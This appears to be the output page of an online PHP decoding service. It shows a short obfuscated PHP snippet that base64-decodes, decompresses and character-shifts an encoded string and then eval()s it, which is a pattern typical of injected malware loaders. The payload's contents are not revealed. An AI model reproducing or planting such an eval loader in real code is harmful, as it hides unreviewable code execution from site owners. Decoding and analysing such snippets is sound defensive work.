Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function CLsI($ZzvSWE) { $ZzvSWE = gzinflate(base64_decode($ZzvSWE)); ..

Decoded Output download

<?php 
function CLsI($ZzvSWE) { 
  
    $ZzvSWE = gzinflate(base64_decode($ZzvSWE)); 
  
    for ($i = 0; $i < strlen($ZzvSWE); $i++) { 
  
        $ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1); 
  
    } 
  
    return $ZzvSWE; 
  
} 
eval(CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA==")); 
?>

Did this file decode correctly?

Original Code

<?php
function CLsI($ZzvSWE) {
 
    $ZzvSWE = gzinflate(base64_decode($ZzvSWE));
 
    for ($i = 0; $i < strlen($ZzvSWE); $i++) {
 
        $ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);
 
    }
 
    return $ZzvSWE;
 
}
eval(CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));
?>

Function Calls

chr 44
ord 44
CLsI 1
strlen 45
gzinflate 1
base64_decode 1

Variables

$i 44

Stats

MD5 e6acf8c4d17cbf9b41f287591abb44e9
Eval Count 1
Decode Time 266 ms